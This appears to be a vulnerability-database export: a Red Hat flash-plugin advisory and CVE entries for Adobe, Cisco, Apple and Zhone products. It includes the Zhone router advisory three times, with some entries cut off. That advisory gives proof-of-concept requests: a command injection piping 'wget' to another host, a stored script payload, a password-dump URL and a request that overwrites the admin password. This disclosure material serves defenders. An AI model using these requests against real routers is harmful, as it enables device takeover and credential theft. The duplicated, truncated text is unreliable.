Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:1893-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1893.html
Issue date: 2015-10-15
CVE Names: CVE-2015-5569 CVE-2015-7625 CVE-2015-7626
CVE-2015-7627 CVE-2015-7628 CVE-2015-7629
CVE-2015-7630 CVE-2015-7631 CVE-2015-7632
CVE-2015-7633 CVE-2015-7634 CVE-2015-7643
CVE-2015-7644
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities, detailed in the Adobe Security Bulletin APSB15-25 listed
in the References section, could allow an attacker to create a specially
crafted SWF file that would cause flash-plugin to crash, execute arbitrary
code, or disclose sensitive information when the victim loaded a page
containing the malicious SWF content.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1271383 - flash-plugin: multiple code execution issues fixed in APSB15-25
1271388 - flash-plugin: information leak and hardening fixes in APSB15-25
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
x86_64:
flash-plugin-11.2.202.535-1.el6_7.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-5569
https://access.redhat.com/security/cve/CVE-2015-7625
https://access.redhat.com/security/cve/CVE-2015-7626
https://access.redhat.com/security/cve/CVE-2015-7627
https://access.redhat.com/security/cve/CVE-2015-7628
https://access.redhat.com/security/cve/CVE-2015-7629
https://access.redhat.com/security/cve/CVE-2015-7630
https://access.redhat.com/security/cve/CVE-2015-7631
https://access.redhat.com/security/cve/CVE-2015-7632
https://access.redhat.com/security/cve/CVE-2015-7633
https://access.redhat.com/security/cve/CVE-2015-7634
https://access.redhat.com/security/cve/CVE-2015-7643
https://access.redhat.com/security/cve/CVE-2015-7644
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-25.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFWH5NuXlSAg2UNWIIRAvqkAJ9lON9Rky8IogN+LkeEn3KgxxlWIACfeHmR
muWHgTd958nNy5EHHzsSy4I=
=T7iE
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201510-0046 | CVE-2015-7621 | Windows and Mac OS X Run on Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via a crafted U3D object, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, and CVE-2015-7617. This vulnerability CVE-2015-5586 , CVE-2015-6683 , CVE-2015-6684 , CVE-2015-6687 , CVE-2015-6688 , CVE-2015-6689 , CVE-2015-6690 , CVE-2015-6691 , CVE-2015-7615 ,and CVE-2015-7617 Is a different vulnerability. Supplementary information : CWE Vulnerability type by CWE-416: Use-after-free ( Use of freed memory ) Has been identified. http://cwe.mitre.org/data/definitions/416.htmlCrafted by attackers U3D Arbitrary code may be executed through the object. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of U3D objects. A specially crafted U3D object can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process. Adobe Acrobat and Reader are prone to multiple remote code-execution vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Adobe Reader, etc. are all products of Adobe (Adobe) in the United States. Adobe Reader is a free PDF file reader; Acrobat is a PDF file editing and conversion tool; Acrobat Reader DC is a set of tools for viewing, printing and annotating PDF. A use-after-free vulnerability exists in several Adobe products. 30060 and earlier, Acrobat XI Desktop 11.0.12 and earlier, Reader XI Desktop 11.0.12 and earlier, Acrobat X Desktop 10.1.15 and earlier, Reader X Desktop 10.1.15 and earlier
| VAR-201911-1582 | CVE-2014-8356 | Zhone zNID 2426A Vulnerabilities related to authentication avoidance due to user-controlled keys |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
The web administrative portal in Zhone zNID 2426A before S3.0.501 allows remote authenticated users to bypass intended access restrictions via a modified server response, related to an insecure direct object reference. Zhone zNID 2426A Contains a vulnerability related to authentication avoidance due to user-controlled keys.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Zhone Technologies zNID GPON 24xx, 24xxA, 42xx, 42xxA, 26xx and 28xx are router products of Zhone Technologies, USA. A security vulnerability exists in Zhone Technologies zNID GPON that caused the program to fail to enforce authentication. An attacker could exploit this vulnerability to gain unauthorized access. Multiple ZHONE Routers are prone to following security vulnerabilities:
1. Multiple HTML injection vulnerabilities
2. An information disclosure vulnerability
3. An authorization-bypass vulnerability
4. Multiple stack-based buffer-overflow vulnerabilities
5. A remote command-execution vulnerability
6. A privilege-escalation vulnerability
Successful exploits allow attacker-supplied HTML and script code to run in the context of the affected browser potentially allowing attackers to steal cookie-based authentication credentials, control how the site is rendered to the user, execute arbitrary commands, gain access to sensitive information, gain elevated privileges, execute arbitrary code and bypass security restrictions and perform unauthorized actions.
Note: Reportedly these issues affect multiple ZHONE routers running firmware versions prior to S3.0.501 and fixed in S3.1.241, but this has not been confirmed by the vendor. Vantage Point Security Advisory 2015-002
========================================
Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Summary:
--------
1. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server.
Affected URL: http://<Router URL>/menuBcm.js
To demonstrate the issue:
1. Set your browser proxy to Burp Suite
2. Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user:
3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal.
2. Admin Password Disclosure (CVE-2014-8357)
--------------------------------------------
Any low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords.
Affected URL: http://<Router URL>/
1. Browse to http://192.168.1.1/backupsettings.html:
2. "View Source" and take note of the sessionKey:
3. Browse to http://<Router
URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session
Key Here>. and all user account passwords will be returned.
3. Remote Code Injection (CVE-2014-9118)
----------------------------------------
Remote Command Injection in ZHONE Router Web Administrative Console
Any user of the ZHONE Router can gain command injection on the router and can execute arbitrary commands on the host operating system via the vulnerable ZHONE router web administrative console.
Affected URL:
/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
Affected Parameter:
ipAddr
4. Stored Cross-Site Scripting
---------------------------------------------------------------------------------------
The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack.
Sample HTTP Request:
GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive
Affected Parameters:
1. snmpSysName
2. snmpSysLocation
3. snmpSysContact
5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality
---------------------------------------------------------------------------------------
A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router.
Sample POST Request:
POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438
-----------------------------75010019812050198961998600862
Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf
<?xml version="1.0"?> <DslCpeConfig version="3.2">
...
<AdminPassword>dnFmMUJyM3oB</AdminPassword>
...
--- Configuration File Contents ---
</DslCpeConfig>
Fix Information:
----------------
Upgrade to version S3.1.241
Timeline:
---------
2014/10: Issues No. (1 & 2) reported to Zhone
2014/12: Issues No. (1 & 3) reported to Zhone
2015/01: Requested Update
2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/02: Sent P.O.C Video to show how vulnerabilities work
2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/04: Requested Update
2015/04: Issues No. (4 & 5) reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Fixes for issue 1, 4 and 5 completed by Zhone
2015/10: Confirm that all issues has been fixed
About Vantage Point Security:
--------------------
Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.
https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
| VAR-201510-0015 | CVE-2015-6333 | Cisco Application Policy Infrastructure Controller Vulnerability gained in |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Cisco Application Policy Infrastructure Controller (APIC) 1.1j allows local users to gain privileges via vectors involving addition of an SSH key, aka Bug ID CSCuw46076. Cisco Application Policy Infrastructure Controller (APIC) Contains a privileged vulnerability.
A local attacker may exploit this issue to gain elevated privileges on the affected system.
This issue is being tracked by Cisco Bug ID CSCuw46076
| VAR-201510-0016 | CVE-2015-6334 | Cisco ASR 5000 and Cisco ASR 5500 Service disruption in device software (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco ASR 5000 and 5500 devices with software 18.0.0.57828 and 19.0.M0.61045 allow remote attackers to cause a denial of service (vpnmgr process restart) via a crafted header in a TACACS packet, aka Bug ID CSCuw01984. Allows a remote attacker to submit a special TACACS packet header to restart the vpnmgr process.
This issue is being tracked by Cisco Bug IDs CSCuw01984 and CSCuw01985
| VAR-201510-0299 | CVE-2015-6263 | Cisco IOS of RADIUS Denial of service in client implementation (DoS) Vulnerability |
CVSS V2: 6.3 CVSS V3: - Severity: MEDIUM |
The RADIUS client implementation in Cisco IOS 15.4(3)M2.2, when a shared RADIUS secret is configured, allows remote RADIUS servers to cause a denial of service (device reload) via malformed answers, aka Bug ID CSCuu59324. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is caused by the fact that the program does not correctly parse the malformed RADIUS packet returned by the RADIUS server
| VAR-201710-0146 | CVE-2014-8357 | Zhone zNID GPON 2426A Vulnerabilities related to certificate and password management |
CVSS V2: 4.0 CVSS V3: 8.8 Severity: HIGH |
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf. Zhone zNID GPON 2426A Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Zhone Technologies zNID GPON 24xx, 24xxA, 42xx, 42xxA, 26xx and 28xx are router products of Zhone Technologies, USA. Multiple ZHONE Routers are prone to following security vulnerabilities:
1. Multiple HTML injection vulnerabilities
2. An information disclosure vulnerability
3. An authorization-bypass vulnerability
4. Multiple stack-based buffer-overflow vulnerabilities
5. A remote command-execution vulnerability
6. A privilege-escalation vulnerability
Successful exploits allow attacker-supplied HTML and script code to run in the context of the affected browser potentially allowing attackers to steal cookie-based authentication credentials, control how the site is rendered to the user, execute arbitrary commands, gain access to sensitive information, gain elevated privileges, execute arbitrary code and bypass security restrictions and perform unauthorized actions.
Note: Reportedly these issues affect multiple ZHONE routers running firmware versions prior to S3.0.501 and fixed in S3.1.241, but this has not been confirmed by the vendor. Zhone Technologies zNID GPON 2426A version earlier than S3.0.501 has a security vulnerability in the backupsettings.html web page of the web management portal. Vantage Point Security Advisory 2015-002
========================================
Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Summary:
--------
1. Insecure Direct Object Reference (CVE-2014-8356)
---------------------------------------------------
The administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server.
Affected URL: http://<Router URL>/menuBcm.js
To demonstrate the issue:
1. Set your browser proxy to Burp Suite
2. Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user:
3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal.
2. As these passwords are stored in the backup file, a malicious user can obtain all account passwords.
Affected URL: http://<Router URL>/
1. Browse to http://192.168.1.1/backupsettings.html:
2. "View Source" and take note of the sessionKey:
3. Browse to http://<Router
URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session
Key Here>. and all user account passwords will be returned.
3. Remote Code Injection (CVE-2014-9118)
----------------------------------------
Remote Command Injection in ZHONE Router Web Administrative Console
Any user of the ZHONE Router can gain command injection on the router and can execute arbitrary commands on the host operating system via the vulnerable ZHONE router web administrative console.
Affected URL:
/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
Affected Parameter:
ipAddr
4. Stored Cross-Site Scripting
---------------------------------------------------------------------------------------
The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack.
Sample HTTP Request:
GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive
Affected Parameters:
1. snmpSysName
2. snmpSysLocation
3. snmpSysContact
5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality
---------------------------------------------------------------------------------------
A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router.
Sample POST Request:
POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438
-----------------------------75010019812050198961998600862
Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf
<?xml version="1.0"?> <DslCpeConfig version="3.2">
...
<AdminPassword>dnFmMUJyM3oB</AdminPassword>
...
--- Configuration File Contents ---
</DslCpeConfig>
Fix Information:
----------------
Upgrade to version S3.1.241
Timeline:
---------
2014/10: Issues No. (1 & 2) reported to Zhone
2014/12: Issues No. (1 & 3) reported to Zhone
2015/01: Requested Update
2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/02: Sent P.O.C Video to show how vulnerabilities work
2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/04: Requested Update
2015/04: Issues No. (4 & 5) reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Fixes for issue 1, 4 and 5 completed by Zhone
2015/10: Confirm that all issues has been fixed
About Vantage Point Security:
--------------------
Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.
https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
| VAR-201710-0139 | CVE-2014-9118 | Zhone zNID GPON 2426A Command injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd. Zhone zNID GPON 2426A Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Zhone Technologies zNID GPON 24xx, 24xxA, 42xx, 42xxA, 26xx and 28xx are router products of Zhone Technologies, USA. Multiple ZHONE Routers are prone to following security vulnerabilities:
1. Multiple HTML injection vulnerabilities
2. An information disclosure vulnerability
3. An authorization-bypass vulnerability
4. Multiple stack-based buffer-overflow vulnerabilities
5. A remote command-execution vulnerability
6. A privilege-escalation vulnerability
Successful exploits allow attacker-supplied HTML and script code to run in the context of the affected browser potentially allowing attackers to steal cookie-based authentication credentials, control how the site is rendered to the user, execute arbitrary commands, gain access to sensitive information, gain elevated privileges, execute arbitrary code and bypass security restrictions and perform unauthorized actions.
Note: Reportedly these issues affect multiple ZHONE routers running firmware versions prior to S3.0.501 and fixed in S3.1.241, but this has not been confirmed by the vendor. Vantage Point Security Advisory 2015-002
========================================
Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Summary:
--------
1. Insecure Direct Object Reference (CVE-2014-8356)
---------------------------------------------------
The administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server.
Affected URL: http://<Router URL>/menuBcm.js
To demonstrate the issue:
1. Set your browser proxy to Burp Suite
2. Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user:
3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal.
2. Admin Password Disclosure (CVE-2014-8357)
--------------------------------------------
Any low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords.
Affected URL: http://<Router URL>/
1. Browse to http://192.168.1.1/backupsettings.html:
2. "View Source" and take note of the sessionKey:
3. Browse to http://<Router
URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session
Key Here>. and all user account passwords will be returned.
3.
Affected URL:
/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
Affected Parameter:
ipAddr
4. Stored Cross-Site Scripting
---------------------------------------------------------------------------------------
The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack.
Sample HTTP Request:
GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive
Affected Parameters:
1. snmpSysName
2. snmpSysLocation
3. snmpSysContact
5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality
---------------------------------------------------------------------------------------
A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router.
Sample POST Request:
POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438
-----------------------------75010019812050198961998600862
Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf
<?xml version="1.0"?> <DslCpeConfig version="3.2">
...
<AdminPassword>dnFmMUJyM3oB</AdminPassword>
...
--- Configuration File Contents ---
</DslCpeConfig>
Fix Information:
----------------
Upgrade to version S3.1.241
Timeline:
---------
2014/10: Issues No. (1 & 2) reported to Zhone
2014/12: Issues No. (1 & 3) reported to Zhone
2015/01: Requested Update
2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/02: Sent P.O.C Video to show how vulnerabilities work
2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/04: Requested Update
2015/04: Issues No. (4 & 5) reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Fixes for issue 1, 4 and 5 completed by Zhone
2015/10: Confirm that all issues has been fixed
About Vantage Point Security:
--------------------
Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.
https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
| VAR-201510-0416 | CVE-2015-7761 | Apple OS X Vulnerability in obtaining important information in email |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Mail in Apple OS X before 10.11 does not properly recognize user preferences, which allows attackers to obtain sensitive information via an unspecified action during the printing of an e-mail message, a different vulnerability than CVE-2015-7760. Apple OS X is a dedicated operating system developed by Apple for Mac computers. Mail is one of the mail components. The vulnerability is caused by the program not properly restricting user references
| VAR-201510-0415 | CVE-2015-7760 | Apple OS X of launchd of libxpc Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
libxpc in launchd in Apple OS X before 10.11 does not restrict the creation of processes for network connections, which allows remote attackers to cause a denial of service (resource consumption) by repeatedly connecting to the SSH port, a different vulnerability than CVE-2015-7761. Apple OS X is a dedicated operating system developed by Apple for Mac computers
| VAR-201510-0011 | CVE-2015-6328 | Cisco Prime Collaboration Assurance of Web Vulnerabilities that prevent access restrictions in the framework |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
The web framework in Cisco Prime Collaboration Assurance (PCA) 10.5(1) allows remote authenticated users to bypass intended access restrictions and read arbitrary files via a crafted URL, aka Bug ID CSCus88380. Cisco Prime Collaboration Assurance is prone to an information-disclosure vulnerability.
Successfully exploiting this issue may allow an attacker to gain access to sensitive information.
This issue is being tracked by Cisco Bug IDs CSCus62680 and CSCus88380. This solution supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites. A security vulnerability exists in the web framework of Cisco PCA 10.5(1) release
| VAR-201510-0032 | CVE-2015-6322 | Cisco AnyConnect Secure Mobility Client of IPC Vulnerability that bypasses access restrictions on channels |
CVSS V2: 6.6 CVSS V3: - Severity: MEDIUM |
The IPC channel in Cisco AnyConnect Secure Mobility Client 2.0.0343 through 4.1(8) allows local users to bypass intended access restrictions and move arbitrary files by leveraging the lack of source-path validation, aka Bug ID CSCuv48563.
A local attacker may exploit this issue to gain elevated system privileges on the device.
This issue is being tracked by Cisco Bug ID CSCuv48563. The vulnerability is caused by the fact that the program does not verify the source path in the IPC command
| VAR-201510-0012 | CVE-2015-6329 | Cisco Prime Collaboration Provisioning In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in Cisco Prime Collaboration Provisioning 10.6 and 11.0 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCut64074.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue being tracked by Cisco Bug ID CSCut64074. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments
| VAR-201510-0013 | CVE-2015-6331 | Cisco Prime Collaboration Assurance of Web In the framework SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in the web framework in Cisco Prime Collaboration Assurance 10.5(1) allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCus39887.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue being tracked by Cisco Bug ID CSCus39887. This solution supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands
| VAR-201510-0781 | No CVE | Multiple NetGear Routers Remote Authentication Bypass Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
Multiple NetGear Routers are prone to a remote authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions.
| VAR-201510-0009 | CVE-2015-6318 | Cisco TelePresence Video Communication Server Expressway Vulnerable to arbitrary file writing |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Cisco TelePresence Video Communication Server (VCS) Expressway X8.5.1 and X8.5.2 allows local users to write to arbitrary files via an unspecified symlink attack, aka Bug ID CSCuv11969.
Attackers can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files and perform unauthorized actions.
This issue is being tracked by Cisco Bug ID CSCuv11969